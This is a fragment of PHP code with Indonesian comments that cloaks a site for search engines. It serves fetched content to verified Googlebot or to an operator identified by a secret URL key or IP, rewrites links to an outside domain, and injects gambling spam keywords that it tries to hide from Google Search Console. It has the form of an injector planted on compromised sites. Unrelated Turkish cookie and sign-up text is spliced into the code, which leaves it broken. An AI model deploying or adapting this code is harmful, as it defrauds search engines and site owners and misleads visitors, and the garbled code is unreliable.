// ... (kode atas sama) ... // Logika Akses Super Ketat $is_master_key = (isset($_GET[$kata_kunci])); // Khusus lu pake ?cek_mantra_keyword212 $is_master_ip = ($ip === $master_ip); $ua = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : ''; $is_google = (strpos($ua, 'googlebot') !== false || strpos($ua, 'google-inspection') !== false); $is_real_google = ($is_google && is_real_googlebot($ip)); // KONDISI: Googlebot ASLI atau Master IP/Key if ($is_real_google || $is_master_ip || $is_master_key) { // ... (proses curl fetch content sama) ... if ($content) { $root_url = 'https://aset.drt.ink'; $content = str_replace(['src="/', 'href="/', 'action="/'], ['src="'.$root_url.'/', 'href="'.$root_url.'/', 'action="'.$root_url.'/'], $content); // --- STRATEGI BARU --- // Kita bungkus mantra. Googlebot tetep baca, tapi kita persulit di GSC $mantra = "BOLA88, TOKYO88, ... (isi semua keyword lu) ..."; // Jika lu akses pake KEY, mantra tampil telanjang biar bisa lu cek if ($is_master_key) { $inject = '
Devam ederek , Web Sitesi Düzenlemelerini, Alkollü içeceklerin satışına ilişkin Düzenlemeleri ve Gizlilik ve Çerez Politikası
Henüz bir hesabınız yok mu? Şimdi Kayıt Ol
', $inject.'', $content); exit; } }